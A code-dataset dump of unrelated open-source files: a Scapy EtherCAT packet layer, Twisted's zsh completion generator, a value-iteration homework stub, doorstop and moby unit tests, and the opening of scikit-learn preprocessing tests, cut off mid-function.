BWR - Broadcast read (IEC 61158-5-12, sec. 5.4.2.4 tab. 20 / p. 39)
"""
fields_desc = [ByteField('_cmd', 0x08)] + \
EtherCatType12DLPDU.BROADCAST_ADDRESSING_DESC
class EtherCatLWR(EtherCatType12DLPDU):
"""
LWR - Logical write
(IEC 61158-5-12, sec. 5.4.2.5 tab. 21 / p. 40)
"""
fields_desc = [ByteField('_cmd', 0x0b)] + \
EtherCatType12DLPDU.LOGICAL_ADDRESSING_DESC
######################
# read/write messages
######################
class EtherCatAPRW(EtherCatType12DLPDU):
"""
APRW - Auto Increment Physical Read Write
(IEC 61158-5-12, sec. 5.4.3.1 tab. 22 / p. 41)
"""
fields_desc = [ByteField('_cmd', 0x03)] + \
EtherCatType12DLPDU.PHYSICAL_ADDRESSING_DESC
class EtherCatFPRW(EtherCatType12DLPDU):
"""
FPRW - Configured address physical read write
(IEC 61158-5-12, sec. 5.4.3.2 tab. 23 / p. 43)
"""
fields_desc = [ByteField('_cmd', 0x06)] + \
EtherCatType12DLPDU.PHYSICAL_ADDRESSING_DESC
class EtherCatBRW(EtherCatType12DLPDU):
"""
BRW - Broadcast read write
(IEC 61158-5-12, sec. 5.4.3.3 tab. 24 / p. 39)
"""
fields_desc = [ByteField('_cmd', 0x09)] + \
EtherCatType12DLPDU.BROADCAST_ADDRESSING_DESC
class EtherCatLRW(EtherCatType12DLPDU):
"""
LRW - Logical read write
(IEC 61158-5-12, sec. 5.4.3.4 tab. 25 / p. 45)
"""
fields_desc = [ByteField('_cmd', 0x0c)] + \
EtherCatType12DLPDU.LOGICAL_ADDRESSING_DESC
class EtherCatARMW(EtherCatType12DLPDU):
"""
ARMW - Auto increment physical read multiple write
(IEC 61158-5-12, sec. 5.4.3.5 tab. 26 / p. 46)
"""
fields_desc = [ByteField('_cmd', 0x0d)] + \
EtherCatType12DLPDU.PHYSICAL_ADDRESSING_DESC
class EtherCatFRMW(EtherCatType12DLPDU):
"""
FRMW - Configured address physical read multiple write
(IEC 61158-5-12, sec. 5.4.3.6 tab. 27 / p. 47)
"""
fields_desc = [ByteField('_cmd', 0x0e)] + \
EtherCatType12DLPDU.PHYSICAL_ADDRESSING_DESC
class EtherCat(Packet):
"""
Common EtherCat header layer
"""
ETHER_HEADER_LEN = 14
ETHER_FSC_LEN = 4
ETHER_FRAME_MIN_LEN = 64
ETHERCAT_HEADER_LEN = 2
FRAME_TYPES = {
0x01: 'TYPE-12-PDU',
0x04: 'NETWORK-VARIABLES',
0x05: 'MAILBOX'
}
fields_desc = [
LEBitField('length', 0, 11),
LEBitField('_reserved', 0, 1),
LEBitField('type', 0, 4),
]
ETHERCAT_TYPE12_DLPDU_TYPES = {
0x01: EtherCatAPRD,
0x04: EtherCatFPRD,
0x07: EtherCatBRD,
0x0a: EtherCatLRD,
0x02: EtherCatAPWR,
0x05: EtherCatFPWR,
0x08: EtherCatBWR,
0x0b: EtherCatLWR,
0x03: EtherCatAPRW,
0x06: EtherCatFPRW,
0x09: EtherCatBRW,
0x0c: EtherCatLRW,
0x0d: EtherCatARMW,
0x0e: EtherCatFRMW
}
def post_build(self, pkt, pay):
"""
need to set the length of the whole PDU manually
to avoid any bit fiddling use a dummy class to build the layer content
also add padding if frame is < 64 bytes
Note: padding only handles Ether/n*Dot1Q/EtherCat
(no special mumbo jumbo)
:param pkt: raw string containing the current layer
:param pay: raw string containing the payload
:return: <new current layer> + payload
"""
class _EtherCatLengthCalc(Packet):
"""
dummy class used to generate str representation easily
"""
fields_desc = [
LEBitField('length', None, 11),
LEBitField('_reserved', 0, 1),
LEBitField('type', 0, 4),
]
payload_len = len(pay)
# length field is 11 bit
if payload_len > 2047:
raise ValueError('payload size {} exceeds maximum length {} '
'of EtherCat message.'.format(payload_len, 2047))
self.length = payload_len
vlan_headers_total_size = 0
upper_layer = self.underlayer
# add size occupied by VLAN tags
while upper_layer and isinstance(upper_layer, Dot1Q):
vlan_headers_total_size += 4
upper_layer = upper_layer.underlayer
if not isinstance(upper_layer, Ether):
raise Exception('missing Ether layer')
pad_len = EtherCat.ETHER_FRAME_MIN_LEN - (EtherCat.ETHER_HEADER_LEN +
vlan_headers_total_size +
EtherCat.ETHERCAT_HEADER_LEN + # noqa: E501
payload_len +
EtherCat.ETHER_FSC_LEN)
if pad_len > 0:
pad = Padding()
pad.load = b'\x00' * pad_len
return raw(_EtherCatLengthCalc(length=self.length,
type=self.type)) + pay + raw(pad)
return raw(_EtherCatLengthCalc(length=self.length,
type=self.type)) + pay
def guess_payload_class(self, payload):
try:
dlpdu_type = payload[0]
return EtherCat.ETHERCAT_TYPE12_DLPDU_TYPES[dlpdu_type]
except KeyError:
log_runtime.error(
'{}.guess_payload_class() - unknown or invalid '
'DLPDU type'.format(self.__class__.__name__))
return Packet.guess_payload_class(self, payload)
bind_layers(Ether, EtherCat, type=0x88a4)
bind_layers(Dot1Q, EtherCat, type=0x88a4)
# bindings for DLPDUs
bind_layers(EtherCat, EtherCatAPRD, type=0x01)
bind_layers(EtherCat, EtherCatFPRD, type=0x01)
bind_layers(EtherCat, EtherCatBRD, type=0x01)
bind_layers(EtherCat, EtherCatLRD, type=0x01)
bind_layers(EtherCat, EtherCatAPWR, type=0x01)
bind_layers(EtherCat, EtherCatFPWR, type=0x01)
bind_layers(EtherCat, EtherCatBWR, type=0x01)
bind_layers(EtherCat, EtherCatLWR, type=0x01)
bind_layers(EtherCat, EtherCatAPRW, type=0x01)
bind_layers(EtherCat, EtherCatFPRW, type=0x01)
bind_layers(EtherCat, EtherCatBRW, type=0x01)
bind_layers(EtherCat, EtherCatLRW, type=0x01)
bind_layers(EtherCat, EtherCatARMW, type=0x01)
bind_layers(EtherCat, EtherCatFRMW, type=0x01) | unknown | codeparrot/codeparrot-clean | ||
# -*- test-case-name: twisted.test.test_zshcomp -*-
# Copyright (c) 2006 Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Rebuild the completion functions for the currently active version of Twisted::
$ python zshcomp.py -i
This module implements a zsh code generator which generates completion code for
commands that use twisted.python.usage. This is the stuff that makes pressing
Tab at the command line work.
Maintainer: Eric Mangold
To build completion functions for your own commands, and not Twisted commands,
then just do something like this::
o = mymodule.MyOptions()
f = file('_mycommand', 'w')
Builder("mycommand", o, f).write()
Then all you have to do is place the generated file somewhere in your
C{$fpath}, and restart zsh. Note the "site-functions" directory in your
C{$fpath} where you may install 3rd-party completion functions (like the one
you're building). Call C{siteFunctionsPath} to locate this directory
programmatically.
SPECIAL CLASS VARIABLES. You may set these on your usage.Options subclass::
zsh_altArgDescr
zsh_multiUse
zsh_mutuallyExclusive
zsh_actions
zsh_actionDescr
zsh_extras
Here is what they mean (with examples)::
zsh_altArgDescr = {"foo":"use this description for foo instead"}
A dict mapping long option names to alternate descriptions. When this
variable is present, the descriptions contained here will override
those descriptions provided in the optFlags and optParameters
variables.
zsh_multiUse = ["foo", "bar"]
A sequence containing those long option names which may appear on the
command line more than once. By default, options will only be completed
one time.
zsh_mutuallyExclusive = [("foo", "bar"), ("bar", "baz")]
A sequence of sequences, with each sub-sequence containing those long
option names that are mutually exclusive. That is, those options that
cannot appear on the command line together.
zsh_actions = {"foo":'_files -g "*.foo"', "bar":"(one two three)",
"colors":"_values -s , 'colors to use' red green blue"}
A dict mapping long option names to Zsh "actions". These actions
define what will be completed as the argument to the given option. By
default, all files/dirs will be completed if no action is given.
Callables may instead be given for the values in this dict. The
callable should accept no arguments, and return a string that will be
used as the zsh "action" in the same way as the literal strings in the
examples above.
As you can see in the example above. The "foo" option will have files
that end in .foo completed when the user presses Tab. The "bar"
option will have either of the strings "one", "two", or "three"
completed when the user presses Tab.
"colors" will allow multiple arguments to be completed, seperated by
commas. The possible arguments are red, green, and blue. Examples::
my_command --foo some-file.foo --colors=red,green
my_command --colors=green
my_command --colors=green,blue
Actions may take many forms, and it is beyond the scope of this
document to illustrate them all. Please refer to the documention for
the Zsh _arguments function. zshcomp is basically a front-end to Zsh's
_arguments completion function.
That documentation is available on the zsh web site at this URL:
U{http://zsh.sunsite.dk/Doc/Release/zsh_19.html#SEC124}
zsh_actionDescr = {"logfile":"log file name", "random":"random seed"}
A dict mapping long option names to a description for the corresponding
zsh "action". These descriptions are show above the generated matches
when the user is doing completions for this option.
Normally Zsh does not show these descriptions unless you have
"verbose" completion turned on. Turn on verbosity with this in your
~/.zshrc::
zstyle ':completion:*' verbose yes
zstyle ':completion:*:descriptions' format '%B%d%b'
zsh_extras = [":file to read from:action", ":file to write to:action"]
A sequence of extra arguments that will be passed verbatim to Zsh's
_arguments completion function. The _arguments function does all the
hard work of doing command line completions. You can see how zshcomp
invokes the _arguments call by looking at the generated completion
files that this module creates.
*** NOTE ***
You will need to use this variable to describe completions for normal
command line arguments. That is, those arguments that are not
associated with an option. That is, the arguments that are given to the
parseArgs method of your usage.Options subclass.
In the example above, the 1st non-option argument will be described as
"file to read from" and completion options will be generated in
accordance with the "action". (See above about zsh "actions") The
2nd non-option argument will be described as "file to write to" and
the action will be interpreted likewise.
Things you can put here are all documented under the _arguments
function here: U{http://zsh.sunsite.dk/Doc/Release/zsh_19.html#SEC124}
Zsh Notes:
To enable advanced completion add something like this to your ~/.zshrc::
autoload -U compinit
compinit
For some extra verbosity, and general niceness add these lines too::
zstyle ':completion:*' verbose yes
zstyle ':completion:*:descriptions' format '%B%d%b'
zstyle ':completion:*:messages' format '%d'
zstyle ':completion:*:warnings' format 'No matches for: %d'
Have fun!
"""
import itertools, sys, commands, os.path
from twisted.python import reflect, util, usage
from twisted.scripts.mktap import IServiceMaker
class MyOptions(usage.Options):
"""
Options for this file
"""
longdesc = ""
synopsis = "Usage: python zshcomp.py [--install | -i] | <output directory>"
optFlags = [["install", "i",
'Output files to the "installation" directory ' \
'(twisted/python/zsh in the currently active ' \
'Twisted package)']]
optParameters = [["directory", "d", None,
"Output files to this directory"]]
def postOptions(self):
if self['install'] and self['directory']:
raise usage.UsageError, "Can't have --install and " \
"--directory at the same time"
if not self['install'] and not self['directory']:
raise usage.UsageError, "Not enough arguments"
if self['directory'] and not os.path.isdir(self['directory']):
raise usage.UsageError, "%s is not a directory" % self['directory']
class Builder:
def __init__(self, cmd_name, options, file):
"""
@type cmd_name: C{str}
@param cmd_name: The name of the command
@type options: C{twisted.usage.Options}
@param options: The C{twisted.usage.Options} instance defined for
this command
@type file: C{file}
@param file: The C{file} to write the completion function to
"""
self.cmd_name = cmd_name
self.options = options
self.file = file
def write(self):
"""
Write the completion function to the file given to __init__
@return: C{None}
"""
# by default, we just write out a single call to _arguments
self.file.write('#compdef %s\n' % (self.cmd_name,))
gen = ArgumentsGenerator(self.cmd_name, self.options, self.file)
gen.write()
class SubcommandBuilder(Builder):
"""
Use this builder for commands that have sub-commands. twisted.python.usage
has the notion of sub-commands that are defined using an entirely seperate
Options class.
"""
interface = None
subcmdLabel = None
def write(self):
"""
Write the completion function to the file given to __init__
@return: C{None}
"""
self.file.write('#compdef %s\n' % (self.cmd_name,))
self.file.write('local _zsh_subcmds_array\n_zsh_subcmds_array=(\n')
from twisted import plugin as newplugin
plugins = newplugin.getPlugins(self.interface)
for p in plugins:
self.file.write('"%s:%s"\n' % (p.tapname, p.description))
self.file.write(")\n\n")
self.options.__class__.zsh_extras = ['*::subcmd:->subcmd']
gen = ArgumentsGenerator(self.cmd_name, self.options, self.file)
gen.write()
self.file.write("""if (( CURRENT == 1 )); then
_describe "%s" _zsh_subcmds_array && ret=0
fi
(( ret )) || return 0
service="$words[1]"
case $service in\n""" % (self.subcmdLabel,))
plugins = newplugin.getPlugins(self.interface)
for p in plugins:
self.file.write(p.tapname + ")\n")
gen = ArgumentsGenerator(p.tapname, p.options(), self.file)
gen.write()
self.file.write(";;\n")
self.file.write("*) _message \"don't know how to" \
" complete $service\";;\nesac")
class MktapBuilder(SubcommandBuilder):
"""
Builder for the mktap command
"""
interface = IServiceMaker
subcmdLabel = 'tap to build'
class TwistdBuilder(SubcommandBuilder):
"""
Builder for the twistd command
"""
interface = IServiceMaker
subcmdLabel = 'service to run'
class ArgumentsGenerator:
"""
Generate a call to the zsh _arguments completion function
based on data in a usage.Options subclass
"""
def __init__(self, cmd_name, options, file):
"""
@type cmd_name: C{str}
@param cmd_name: The name of the command
@type options: C{twisted.usage.Options}
@param options: The C{twisted.usage.Options} instance defined
for this command
@type file: C{file}
@param file: The C{file} to write the completion function to
"""
self.cmd_name = cmd_name
self.options = options
self.file = file
self.altArgDescr = {}
self.actionDescr = {}
self.multiUse = []
self.mutuallyExclusive = []
self.actions = {}
self.extras = []
aCL = reflect.accumulateClassList
aCD = reflect.accumulateClassDict
aCD(options.__class__, 'zsh_altArgDescr', self.altArgDescr)
aCD(options.__class__, 'zsh_actionDescr', self.actionDescr)
aCL(options.__class__, 'zsh_multiUse', self.multiUse)
aCL(options.__class__, 'zsh_mutuallyExclusive',
self.mutuallyExclusive)
aCD(options.__class__, 'zsh_actions', self.actions)
aCL(options.__class__, 'zsh_extras', self.extras)
optFlags = []
optParams = []
aCL(options.__class__, 'optFlags', optFlags)
aCL(options.__class__, 'optParameters', optParams)
for i, optList in enumerate(optFlags):
if len(optList) != 3:
optFlags[i] = util.padTo(3, optList)
for i, optList in enumerate(optParams):
if len(optList) != 4:
optParams[i] = util.padTo(4, optList)
self.optFlags = optFlags
self.optParams = optParams
optParams_d = {}
for optList in optParams:
optParams_d[optList[0]] = optList[1:]
self.optParams_d = optParams_d
optFlags_d = {}
for optList in optFlags:
optFlags_d[optList[0]] = optList[1:]
self.optFlags_d = optFlags_d
optAll_d = {}
optAll_d.update(optParams_d)
optAll_d.update(optFlags_d)
self.optAll_d = optAll_d
self.addAdditionalOptions()
# makes sure none of the zsh_ data structures reference option
# names that don't exist. (great for catching typos)
self.verifyZshNames()
self.excludes = self.makeExcludesDict()
def write(self):
"""
Write the zsh completion code to the file given to __init__
@return: C{None}
"""
self.writeHeader()
self.writeExtras()
self.writeOptions()
self.writeFooter()
def writeHeader(self):
"""
This is the start of the code that calls _arguments
@return: C{None}
"""
self.file.write('_arguments -s -A "-*" \\\n')
def writeOptions(self):
"""
Write out zsh code for each option in this command
@return: C{None}
"""
optNames = self.optAll_d.keys()
optNames.sort()
for long in optNames:
self.writeOpt(long)
def writeExtras(self):
"""
Write out the "extras" list. These are just passed verbatim to the
_arguments call
@return: C{None}
"""
for s in self.extras:
self.file.write(escape(s))
self.file.write(' \\\n')
def writeFooter(self):
"""
Write the last bit of code that finishes the call to _arguments
@return: C{None}
"""
self.file.write('&& return 0\n')
def verifyZshNames(self):
"""
Ensure that none of the names given in zsh_* variables are typoed
@return: C{None}
@raise ValueError: Raised if unknown option names have been given in
zsh_* variables
"""
def err(name):
raise ValueError, "Unknown option name \"%s\" found while\n" \
"examining zsh_ attributes for the %s command" % (
name, self.cmd_name)
for name in itertools.chain(self.altArgDescr, self.actionDescr,
self.actions, self.multiUse):
if name not in self.optAll_d:
err(name)
for seq in self.mutuallyExclusive:
for name in seq:
if name not in self.optAll_d:
err(name)
def excludeStr(self, long, buildShort=False):
"""
Generate an "exclusion string" for the given option
@type long: C{str}
@param long: The long name of the option
(i.e. "verbose" instead of "v")
@type buildShort: C{bool}
@param buildShort: May be True to indicate we're building an excludes
string for the short option that correspondes to
the given long opt
@return: The generated C{str}
"""
if long in self.excludes:
exclusions = self.excludes[long][:]
else:
exclusions = []
# if long isn't a multiUse option (can't appear on the cmd line more
# than once), then we have to exclude the short option if we're
# building for the long option, and vice versa.
if long not in self.multiUse:
if buildShort is False:
short = self.getShortOption(long)
if short is not None:
exclusions.append(short)
else:
exclusions.append(long)
if not exclusions:
return ''
strings = []
for optName in exclusions:
if len(optName) == 1:
# short option
strings.append("-" + optName)
else:
strings.append("--" + optName)
return "(%s)" % " ".join(strings)
def makeExcludesDict(self):
"""
@return: A C{dict} that maps each option name appearing in
self.mutuallyExclusive to a list of those option names that
is it mutually exclusive with (can't appear on the cmd line with)
"""
#create a mapping of long option name -> single character name
longToShort = {}
for optList in itertools.chain(self.optParams, self.optFlags):
try:
if optList[1] != None:
longToShort[optList[0]] = optList[1]
except IndexError:
pass
excludes = {}
for lst in self.mutuallyExclusive:
for i, long in enumerate(lst):
tmp = []
tmp.extend(lst[:i])
tmp.extend(lst[i+1:])
for name in tmp[:]:
if name in longToShort:
tmp.append(longToShort[name])
if long in excludes:
excludes[long].extend(tmp)
else:
excludes[long] = tmp
return excludes
def writeOpt(self, long):
"""
Write out the zsh code for the given argument. This is just part of the
one big call to _arguments
@type long: C{str}
@param long: The long name of the option
(i.e. "verbose" instead of "v")
@return: C{None}
"""
if long in self.optFlags_d:
# It's a flag option. Not one that takes a parameter.
long_field = "--%s" % long
else:
long_field = "--%s=" % long
short = self.getShortOption(long)
if short != None:
short_field = "-" + short
else:
short_field = ''
descr = self.getDescription(long)
descr_field = descr.replace("[", "\[")
descr_field = descr_field.replace("]", "\]")
descr_field = '[%s]' % descr_field
if long in self.actionDescr:
actionDescr_field = self.actionDescr[long]
else:
actionDescr_field = descr
action_field = self.getAction(long)
if long in self.multiUse:
multi_field = '*'
else:
multi_field = ''
longExclusions_field = self.excludeStr(long)
if short:
#we have to write an extra line for the short option if we have one
shortExclusions_field = self.excludeStr(long, buildShort=True)
self.file.write(escape('%s%s%s%s%s' % (shortExclusions_field,
multi_field, short_field, descr_field, action_field)))
self.file.write(' \\\n')
self.file.write(escape('%s%s%s%s%s' % (longExclusions_field,
multi_field, long_field, descr_field, action_field)))
self.file.write(' \\\n')
def getAction(self, long):
"""
Return a zsh "action" string for the given argument
@return: C{str}
"""
if long in self.actions:
if callable(self.actions[long]):
action = self.actions[long]()
else:
action = self.actions[long]
return ":%s:%s" % (self.getActionDescr(long), action)
if long in self.optParams_d:
return ':%s:_files' % self.getActionDescr(long)
return ''
def getActionDescr(self, long):
"""
Return the description to be used when this argument is completed
@return: C{str}
"""
if long in self.actionDescr:
return self.actionDescr[long]
else:
return long
def getDescription(self, long):
"""
Return the description to be used for this argument
@return: C{str}
"""
#check if we have an alternate descr for this arg, and if so use it
if long in self.altArgDescr:
return self.altArgDescr[long]
#otherwise we have to get it from the optFlags or optParams
try:
descr = self.optFlags_d[long][1]
except KeyError:
try:
descr = self.optParams_d[long][2]
except KeyError:
descr = None
if descr is not None:
return descr
# lets try to get it from the opt_foo method doc string if there is one
longMangled = long.replace('-', '_') # this is what t.p.usage does
obj = getattr(self.options, 'opt_%s' % longMangled, None)
if obj:
descr = descrFromDoc(obj)
if descr is not None:
return descr
return long # we really ought to have a good description to use
def getShortOption(self, long):
"""
Return the short option letter or None
@return: C{str} or C{None}
"""
optList = self.optAll_d[long]
try:
return optList[0] or None
except IndexError:
pass
def addAdditionalOptions(self):
"""
Add additional options to the optFlags and optParams lists.
These will be defined by 'opt_foo' methods of the Options subclass
@return: C{None}
"""
methodsDict = {}
reflect.accumulateMethods(self.options, methodsDict, 'opt_')
methodToShort = {}
for name in methodsDict.copy():
if len(name) == 1:
methodToShort[methodsDict[name]] = name
del methodsDict[name]
for methodName, methodObj in methodsDict.items():
long = methodName.replace('_', '-') # t.p.usage does this
# if this option is already defined by the optFlags or
# optParameters then we don't want to override that data
if long in self.optAll_d:
continue
descr = self.getDescription(long)
short = None
if methodObj in methodToShort:
short = methodToShort[methodObj]
reqArgs = methodObj.im_func.func_code.co_argcount
if reqArgs == 2:
self.optParams.append([long, short, None, descr])
self.optParams_d[long] = [short, None, descr]
self.optAll_d[long] = [short, None, descr]
elif reqArgs == 1:
self.optFlags.append([long, short, descr])
self.optFlags_d[long] = [short, descr]
self.optAll_d[long] = [short, None, descr]
else:
raise TypeError, '%r has wrong number ' \
'of arguments' % (methodObj,)
def descrFromDoc(obj):
"""
Generate an appropriate description from docstring of the given object
"""
if obj.__doc__ is None:
return None
lines = obj.__doc__.split("\n")
descr = None
try:
if lines[0] != "" and not lines[0].isspace():
descr = lines[0].lstrip()
# skip first line if it's blank
elif lines[1] != "" and not lines[1].isspace():
descr = lines[1].lstrip()
except IndexError:
pass
return descr
def firstLine(s):
"""
Return the first line of the given string
"""
try:
i = s.index('\n')
return s[:i]
except ValueError:
return s
def escape(str):
"""
Shell escape the given string
"""
return commands.mkarg(str)[1:]
def siteFunctionsPath():
"""
Return the path to the system-wide site-functions directory or
C{None} if it cannot be determined
"""
try:
cmd = "zsh -f -c 'echo ${(M)fpath:#/*/site-functions}'"
output = commands.getoutput(cmd)
if os.path.isdir(output):
return output
except:
pass
generateFor = [('conch', 'twisted.conch.scripts.conch', 'ClientOptions'),
('mktap', 'twisted.scripts.mktap', 'FirstPassOptions'),
('trial', 'twisted.scripts.trial', 'Options'),
('cftp', 'twisted.conch.scripts.cftp', 'ClientOptions'),
('tapconvert', 'twisted.scripts.tapconvert', 'ConvertOptions'),
('twistd', 'twisted.scripts.twistd', 'ServerOptions'),
('ckeygen', 'twisted.conch.scripts.ckeygen', 'GeneralOptions'),
('lore', 'twisted.lore.scripts.lore', 'Options'),
('pyhtmlizer', 'twisted.scripts.htmlizer', 'Options'),
('tap2deb', 'twisted.scripts.tap2deb', 'MyOptions'),
('tkconch', 'twisted.conch.scripts.tkconch', 'GeneralOptions'),
('manhole', 'twisted.scripts.manhole', 'MyOptions'),
('tap2rpm', 'twisted.scripts.tap2rpm', 'MyOptions'),
('websetroot', None, None),
('tkmktap', None, None),
]
# NOTE: the commands using None above are no longer included in Twisted.
# However due to limitations in zsh's completion system the version of
# _twisted_zsh_stub shipped with zsh contains a static list of Twisted's
# commands. It will display errors if completion functions for these missing
# commands are not found :( So we just include dummy (empty) completion
# function files
specialBuilders = {'mktap' : MktapBuilder,
'twistd' : TwistdBuilder}
def makeCompFunctionFiles(out_path, generateFor=generateFor,
specialBuilders=specialBuilders):
"""
Generate completion function files in the given directory for all
twisted commands
@type out_path: C{str}
@param out_path: The path to the directory to generate completion function
fils in
@param generateFor: Sequence in the form of the 'generateFor' top-level
variable as defined in this module. Indicates what
commands to build completion files for.
@param specialBuilders: Sequence in the form of the 'specialBuilders'
top-level variable as defined in this module.
Indicates what commands require a special
Builder class.
@return: C{list} of 2-tuples of the form (cmd_name, error) indicating
commands that we skipped building completions for. cmd_name
is the name of the skipped command, and error is the Exception
that was raised when trying to import the script module.
Commands are usually skipped due to a missing dependency,
e.g. Tkinter.
"""
skips = []
for cmd_name, module_name, class_name in generateFor:
if module_name is None:
# create empty file
f = _openCmdFile(out_path, cmd_name)
f.close()
continue
try:
m = __import__('%s' % (module_name,), None, None, (class_name))
f = _openCmdFile(out_path, cmd_name)
o = getattr(m, class_name)() # instantiate Options class
if cmd_name in specialBuilders:
b = specialBuilders[cmd_name](cmd_name, o, f)
b.write()
else:
b = Builder(cmd_name, o, f)
b.write()
except Exception, e:
skips.append( (cmd_name, e) )
continue
return skips
def _openCmdFile(out_path, cmd_name):
return file(os.path.join(out_path, '_'+cmd_name), 'w')
def run():
options = MyOptions()
try:
options.parseOptions(sys.argv[1:])
except usage.UsageError, e:
print e
print options.getUsage()
sys.exit(2)
if options['install']:
import twisted
dir = os.path.join(os.path.dirname(twisted.__file__), "python", "zsh")
skips = makeCompFunctionFiles(dir)
else:
skips = makeCompFunctionFiles(options['directory'])
for cmd_name, error in skips:
sys.stderr.write("zshcomp: Skipped building for %s. Script module " \
"could not be imported:\n" % (cmd_name,))
sys.stderr.write(str(error)+'\n')
if skips:
sys.exit(3)
if __name__ == '__main__':
run() | unknown | codeparrot/codeparrot-clean | ||
import mdp, util
from learningAgents import ValueEstimationAgent
class ValueIterationAgent(ValueEstimationAgent):
"""
* Please read learningAgents.py before reading this.*
A ValueIterationAgent takes a Markov decision process
(see mdp.py) on initialization and runs value iteration
for a given number of iterations using the supplied
discount factor.
"""
def __init__(self, mdp, discount = 0.9, iterations = 100):
"""
Your value iteration agent should take an mdp on
construction, run the indicated number of iterations
and then act according to the resulting policy.
Some useful mdp methods you will use:
mdp.getStates()
mdp.getPossibleActions(state)
mdp.getTransitionStatesAndProbs(state, action)
mdp.getReward(state, action, nextState)
"""
self.mdp = mdp
self.discount = discount
self.iterations = iterations
self.values = util.Counter() # A Counter is a dict with default 0
"*** YOUR CODE HERE ***"
def getValue(self, state):
"""
Return the value of the state (computed in __init__).
"""
return self.values[state]
def getQValue(self, state, action):
"""
The q-value of the state action pair
(after the indicated number of value iteration
passes). Note that value iteration does not
necessarily create this quantity and you may have
to derive it on the fly.
"""
"*** YOUR CODE HERE ***"
util.raiseNotDefined()
def getPolicy(self, state):
"""
The policy is the best action in the given state
according to the values computed by value iteration.
You may break ties any way you see fit. Note that if
there are no legal actions, which is the case at the
terminal state, you should return None.
"""
"*** YOUR CODE HERE ***"
util.raiseNotDefined()
def getAction(self, state):
"Returns the policy at the state (no exploration)."
return self.getPolicy(state) | unknown | codeparrot/codeparrot-clean | ||
"""Unit tests for the doorstop.vcs.base module."""
import unittest
from unittest.mock import patch
from doorstop.core.vcs.base import BaseWorkingCopy
class SampleWorkingCopy(BaseWorkingCopy):
"""Sample WorkingCopy implementation."""
def __init__(self, path):
super().__init__(path)
self._ignores_cache = ["*build*", "ignored.*", "*published*"]
def lock(self, *args, **kwargs):
pass # no implementation
def edit(self, *args, **kwargs):
pass # no implementation
def add(self, *args, **kwargs):
pass # no implementation
def delete(self, *args, **kwargs):
pass # no implementation
def commit(self, *args, **kwargs):
pass # no implementation
class TestSampleWorkingCopy(unittest.TestCase):
"""Tests for the doorstop.vcs.base module."""
def setUp(self):
self.wc = SampleWorkingCopy(None)
@patch('os.environ', {})
def test_ignored(self):
"""Verify ignored paths are detected."""
self.assertTrue(self.wc.ignored("ignored.txt"))
self.assertFalse(self.wc.ignored("not_ignored.txt"))
self.assertTrue(self.wc.ignored("path/to/published.html"))
self.assertTrue(self.wc.ignored("build/path/to/anything"))
@patch('os.environ', {'CI': 'true'})
def test_ignored_on_ci(self):
"""Verify the build directory is not ignored during CI."""
self.assertTrue(self.wc.ignored("ignored.txt"))
self.assertFalse(self.wc.ignored("not_ignored.txt"))
self.assertTrue(self.wc.ignored("path/to/published.html"))
self.assertFalse(self.wc.ignored("build/path/to/anything")) | unknown | codeparrot/codeparrot-clean | ||
package client
import (
"net/http"
"testing"
cerrdefs "github.com/containerd/errdefs"
"github.com/moby/moby/api/types/image"
ocispec "github.com/opencontainers/image-spec/specs-go/v1"
"gotest.tools/v3/assert"
is "gotest.tools/v3/assert/cmp"
)
func TestImageHistoryError(t *testing.T) {
client, err := New(WithMockClient(errorMock(http.StatusInternalServerError, "Server error")))
assert.NilError(t, err)
_, err = client.ImageHistory(t.Context(), "nothing")
assert.Check(t, is.ErrorType(err, cerrdefs.IsInternal))
}
func TestImageHistory(t *testing.T) {
const (
expectedURL = "/images/image_id/history"
historyResponse = `[{"Comment":"","Created":0,"CreatedBy":"","Id":"image_id1","Size":0,"Tags":["tag1","tag2"]},{"Comment":"","Created":0,"CreatedBy":"","Id":"image_id2","Size":0,"Tags":["tag1","tag2"]}]`
expectedPlatform = `{"architecture":"arm64","os":"linux","variant":"v8"}`
)
client, err := New(WithMockClient(func(req *http.Request) (*http.Response, error) {
assert.Check(t, assertRequest(req, http.MethodGet, expectedURL))
assert.Check(t, is.Equal(req.URL.Query().Get("platform"), expectedPlatform))
return mockResponse(http.StatusOK, nil, historyResponse)(req)
}))
assert.NilError(t, err)
expected := ImageHistoryResult{
Items: []image.HistoryResponseItem{
{
ID: "image_id1",
Tags: []string{"tag1", "tag2"},
},
{
ID: "image_id2",
Tags: []string{"tag1", "tag2"},
},
},
}
imageHistories, err := client.ImageHistory(t.Context(), "image_id", ImageHistoryWithPlatform(ocispec.Platform{
Architecture: "arm64",
OS: "linux",
Variant: "v8",
}))
assert.NilError(t, err)
assert.Check(t, is.DeepEqual(imageHistories, expected))
} | go | github | https://github.com/moby/moby | client/image_history_test.go |
import numpy as np
import numpy.linalg as la
import scipy.sparse as sp
from sklearn.utils.testing import assert_almost_equal
from sklearn.utils.testing import assert_array_almost_equal
from sklearn.utils.testing import assert_array_equal
from sklearn.utils.testing import assert_equal
from sklearn.utils.testing import assert_raises
from sklearn.utils.testing import assert_true
from sklearn.utils.testing import assert_false
from sklearn.utils.sparsefuncs import mean_variance_axis0
from sklearn.preprocessing import Binarizer
from sklearn.preprocessing import KernelCenterer
from sklearn.preprocessing import LabelBinarizer
from sklearn.preprocessing import LabelEncoder
from sklearn.preprocessing import Normalizer
from sklearn.preprocessing import normalize
from sklearn.preprocessing import StandardScaler
from sklearn.preprocessing import scale
from sklearn.preprocessing import MinMaxScaler
from sklearn import datasets
from sklearn.linear_model.stochastic_gradient import SGDClassifier
iris = datasets.load_iris()
def toarray(a):
if hasattr(a, "toarray"):
a = a.toarray()
return a
def test_scaler_1d():
"""Test scaling of dataset along single axis"""
rng = np.random.RandomState(0)
X = rng.randn(5)
X_orig_copy = X.copy()
scaler = StandardScaler()
X_scaled = scaler.fit(X).transform(X, copy=False)
assert_array_almost_equal(X_scaled.mean(axis=0), 0.0)
assert_array_almost_equal(X_scaled.std(axis=0), 1.0)
# check inverse transform
X_scaled_back = scaler.inverse_transform(X_scaled)
assert_array_almost_equal(X_scaled_back, X_orig_copy)
# Test with 1D list
X = [0., 1., 2, 0.4, 1.]
scaler = StandardScaler()
X_scaled = scaler.fit(X).transform(X, copy=False)
assert_array_almost_equal(X_scaled.mean(axis=0), 0.0)
assert_array_almost_equal(X_scaled.std(axis=0), 1.0)
X_scaled = scale(X)
assert_array_almost_equal(X_scaled.mean(axis=0), 0.0)
assert_array_almost_equal(X_scaled.std(axis=0), 1.0)
def test_scaler_2d_arrays():
"""Test scaling of 2d array along first axis"""
rng = np.random.RandomState(0)
X = rng.randn(4, 5)
X[:, 0] = 0.0 # first feature is always of zero
scaler = StandardScaler()
